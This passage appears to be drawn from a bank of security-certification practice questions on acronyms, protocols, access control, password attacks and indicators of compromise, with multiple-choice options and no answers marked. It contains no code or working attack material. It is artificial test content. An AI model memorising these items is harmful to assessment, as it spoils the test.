• EAP-TTLS

• LEAP

• EAP-TLS

A cloud-based solution that provides ongoing oversight and supervision of IT assets and services is
called:

• PaaS

• IaaS

• SaaS

• MaaS

Which of the following terms is used to describe all aspects of software development?

• PLC

• SDLC

• QA

• SDLM

Which of the answers listed below refers to a markup language for exchanging authentication and
authorization data?

• SAML

• XML

• SOAP

• XHTML

What are the characteristic features of SAML? (Select 3 answers)

• Enables only the exchange of SSO authorization data
• Handles both authentication and authorization for SSO

• Uses XML for data exchange

• Commonly used in enterprise environments and legacy systems

• Enables only the exchange of SSO authentication data

• Uses JSON for data exchange

• Specifically designed for web and mobile applications

Which DNS TXT records are used for spam management? (Select 3 answers)

• SPF

• DKIM

• SRV

• DMARC

• PTR

Which of the following terms can be used as a synonym for an aerial drone?

• UGV

• UAV

• USV

• UAP

A software development approach that aims for speedy application creation and continuous
improvement through iterative development and user collaboration is referred to as:

• FDD

• DevOps

• RAD

• SaaS

Which of the protocols listed below is referred to as a connectionless, unreliable, or best-effort
protocol?

• MPLS

• TCP

• SMTP

• UDP

Which of the following answers refers to a software tool that provides a single management interface
for mobile devices, PCs, printers, IoT devices and wearables?

• MDM

• RCS

• UEM

• MAM

Which of the answers listed below refers to a technology that allows USB devices to act as both hosts
and peripherals, enabling them to connect to and communicate with other USB devices directly
without the need for a computer or dedicated host?

• PnP

• OTG

• P2P

• HCI

A messaging service that allows users to send content such as images, videos, and audio along with
text messages to mobile devices is known as:

• MMS

• IRC

• IM

• SMS

What is a common target of XSS?

• Physical security

• Alternate sites

• Dynamic web pages

• Removable storage

Which of the following answers refers to a security policy enforcement software tool or service placed
between cloud service users and cloud applications?

• UTM

• CASB

• NGFW

• DMVPN

Which of the answers listed below refers to a set of procedures put in place to recover IT systems and
data following a major disruption?

• BCP

• DRP

• IRP

• ERP

A technology that enables real-time analysis of security alerts generated by network hardware and
applications is called:

• LACP

• DSCP

• SIEM

• LWAPP

Which of the following acronyms refers to a senior executive responsible for technology-related
decision-making and planning?

• CIO

• CEO

• CTO

• CSO

A network protocol used for secure file transfer over SSH is known as:

• TFTP

• SFTP

• SCP

• FTPS

Which of the answers listed below refers to a virtualization platform for delivering virtual desktops to a
community of users?

• VDE

• VNC

• VDI

• RDP

A solution that simplifies configuration of new wireless networks by allowing non-technical users to
easily configure network security settings and add new devices to an existing network is called:

• WPA

• WPS

• WEP

• WAP

Which of the following answers refers to a text-based command interpreter and scripting language for
Unix-like operating systems?

• CLI

• JS

• Bash

• cmd.exe

A networking hardware device connecting wireless devices to a wired network is referred to as:

• WAF

• AP

• RAS

• NIC

Which of the answers listed below refers to a mobile device deployment model where organizations
provide and own the devices while allowing their personal use?

• BYOD

• COPE

• VDI

• CYOD

Which of the following answers refers to a non-cryptographic hash function often used for
error-checking purposes?

• MD5

• CRC

• SHA

• RIPEMD

What is the name of a network layer protocol that specifies the format of packets and addressing
scheme in network communications?

• UDP

• IP

• TCP

• NetBIOS

The term "P2P" refers to a centralized network architecture in which each participant in the network
can act both as a client and a server, enabling direct communication and file sharing between
individual users without the need for a central server or intermediary.

• True

• False

Which of the answers listed below refers to a set of standards and specifications that define various
cryptographic techniques, including formats for public keys, private keys, digital signatures, and digital
certificates?

• ITIL

• RFC

• PKCS

• ISO/IEC

Which of the following answers refers to a tunneling point-to-point protocol?

• EAP

• PPTP

• MPLS

• PPP

Which of the answers listed below refers to a logical operation commonly used in the context of
cybersecurity, particularly in encryption and obfuscation techniques?

• AND

• OR

• NOT

• XOR

Which of the following answers refers to a public-key cryptosystem used for digital signatures, secure
key exchange, and encryption?

• DHE

• RSA

• AES

• DSA

An authentication mechanism that generates one-time passwords based on the current time and a
secret key is known as:

• OAuth

• TOTP

• RADIUS

• HOTP

Which of the answers listed below refers to the process of maintaining the integrity of files and data?

• DLP

• SIEM

• FIM

• SHA

Which of the following provides a countermeasure against SPOF?
• HA

• DLP

• VM

• AAA

In the AAA security architecture, the process of tracking accessed services as well as the amount of
consumed resources is called:

• Auditing

• Authentication

• Authorization

• Accounting

Which of the answers listed below refers to a method that enables secure conversion of user
passwords into cryptographic keys?

• PBKDF2

• PFS

• RIPEMD

• PKCS #7

Which of the following solutions provides passive network security breach response on an individual
computer system?

• HIDS

• NIPS

• HIPS

• NIDS

Which of the answers listed below refers to a system that identifies, defines, and catalogs publicly
known cybersecurity vulnerabilities?

• TAXII

• CVE

• STIX

• CVSS

Which of the following answers refers to a deprecated (largely replaced by AES) symmetric-key block
cipher encryption algorithm?

• ECDSA

• RSA

• IDEA

• DSA

A limit on the maximum amount of data that can be transmitted over a network without fragmentation
is referred to as:

• DSU

• CSU

• FPS

• MTU

Which of the answers listed below refers to a standardized method employed by the U.S. federal
government to authenticate the identities of employees and contractors via smart card-based
credentials?

• PIV

• MFA

• SAE

• PKI

Which of the following answers refers to an organized approach to managing and mitigating security
incidents?

• XDR

• IR

• SOAR

• IRP

Which type of technology enables contactless payment transactions?

• NFC

• IR

• PED

• WAP

An agreement between a service provider and users defining the nature, availability, quality, and scope
of the service to be provided is known as:

• SOW

• MSA

• SLA

• MOU

Which of the answers listed below refers to a cybersecurity approach that focuses on recognizing and
addressing potential threats originating from multiple sources?

• XDR

• WAF

• EDR

• SWG

Which of the following acronyms refers to a client authentication method used in WPA3?

• SAE

• IKE

• PSK

• AES

Which of the answers listed below refers to a solution used for authentication, authorization, and user
identity management?

• ICS

• AAA

• CIA

• IAM

Which of the following answers refers to a security solution that provides control over elevated (i.e.,
administrative type) accounts?

• MFA

• IAM

• SSO

• PAM

A device designed to provide emergency power during an unexpected main power source outage is
called:

• UPS

• PoE

• SVC

• PSU

Which of the answers listed below refers to an authentication method that enables the signing of an
outbound email message with a digital signature?

• SPF

• DKIM

• SRV

• DMARC

The term "VLAN" refers to a logical grouping of computers that allows computer hosts to function as if
they were attached to the same broadcast domain regardless of their physical location.

• True

• False

Which of the following answers refers to a method that binds a combination of private IP address and
port number with a corresponding public IP address and port information?

• PAT

• NAC

• DNS

• ARP

A file system format used in Windows OSs that offers improved performance, security, and file
management is referred to as:

• ext4

• EFS

• NTFS

• HFS+

A dot-dot-slash attack is also referred to as:

• Disassociation attack

• On-path attack

• Directory traversal attack

• Downgrade attack

A type of cryptographic attack that forces a network protocol to revert to its older, less secure version
is known as:

• Downgrade attack

• Replay attack

• Deauthentication attack

• Spraying attack

A hash collision occurs when a cryptographic hash function produces two different digests for the same
data input.

• True

• False

Which cryptographic attack relies on the concepts of probability theory?

• Brute-force

• KPA

• Dictionary

• Birthday

A short list of commonly used passwords tried against a large number of user accounts is a
characteristic feature of:

• Replay attack

• Dictionary attack

• Spraying attack

• Birthday attack

Which password attack bypasses account-lockout policies?

• Birthday attack

• Replay attack

• Spraying attack

• Dictionary attack

An attack against encrypted data that relies heavily on computing power to check all possible keys and
passwords until the correct one is found is called:

• Replay attack

• Brute-force attack

• Dictionary attack

• Birthday attack

One of the measures for bypassing the failed logon attempt account lockout policy is to capture any
relevant data that might contain the password and brute force it offline.

• True

• False

A type of forensic evidence that can be used to detect unauthorized access attempts or other
malicious activities is called:

• CVE

• IoC

• AIS

• OSINT

An account lockout might indicate which type of malicious activity?

• Attempt to deliver malicious content

• DoS attack

• Account compromise

• Password brute-forcing attempt

Which of the terms listed below most accurately describes a situation wherein a single account is
being used from multiple locations/devices at the same time?

• Spraying attack

• Concurrent session usage

• Single Sign-On (SSO)

• Impossible travel

Which of the following terms refers to a malicious activity indicator in a situation where a firewall or
other security measure prevents an attempt to deliver malicious payload or perform an unauthorized
action?

• DoS attack

• Resource inaccessibility

• Blocked content

• Excessive system resource consumption

Which of the terms listed below most accurately describes a situation wherein an account is accessed
from a location that is physically impossible for the user to be in?

• Login time restrictions

• Impossible travel

• Concurrent session usage

• Out-of-cycle logging

The term "Out-of-cycle logging" refers to instances where systems or applications produce logs
outside their regular intervals or in abnormal volumes, potentially signaling malicious activity.

• True

• False

Which of the following would indicate an attempt to hide evidence of malicious activity?

• Account lockout

• Resource inaccessibility

• Missing logs

• Concurrent session usage

Which of the terms listed below refers to a logical grouping of computers that allows computer hosts to
function as if they were attached to the same broadcast domain regardless of their physical location?

• VLAN

• DMZ

• SNMP community

• VPN

What is the name of a solution that increases the efficiency of IP address space management by
allowing network administrators to divide networks into subnets of different sizes?

• DNAT

• VLSM

• MPLS

• VLAN

Which of the following provides granular control over user access to specific network segments and
resources based on their assigned roles and permissions?

• EDR

• IAM

• AAA

• IPS

Which of the answers listed below refers to a solution that allows for easier management and control
of network segmentation policies through software applications?

• VDI

• SDN

• VPC

• EDR

Which of the following acronyms refers to a set of rules that specify which users or system processes
are granted access to objects as well as what operations are allowed on a given object?

• ACL

• MFA

• NAC

• AUP

A rule-based access control mechanism implemented on routers, switches, and firewalls is referred to
as:

• MAC

• AUP

• DAC

• ACL

Which of the answers listed below refers to a rule-based access control mechanism associated with
files and/or directories?

• EFS

• FACL

• FIM

• NTFS

Which of the following policies applies to any requests that fall outside the criteria defined in an ACL?

• Fair access policy

• Implicit deny policy

• Transitive trust

• Context-aware authentication

Which of the answers listed below does not refer to the concept of network isolation?

• VLANs

• Subnetting

• DLP

• Firewalls

• DMZs

• NAC

• SDN

• Air gaps

• Zero Trust network architecture

Which of the following answers does not refer to the concept of system/application isolation?

• Virtualization

• Containerization

• Sandboxing

• Data encryption

Which of the answers listed below refer(s) to client-based software threat vector(s)? (Select all that
apply)

• Drive-by download via web browser

• Malicious macro

• Vulnerability in a network protocol or device

• USB-based attack

• Malicious attachment in email application
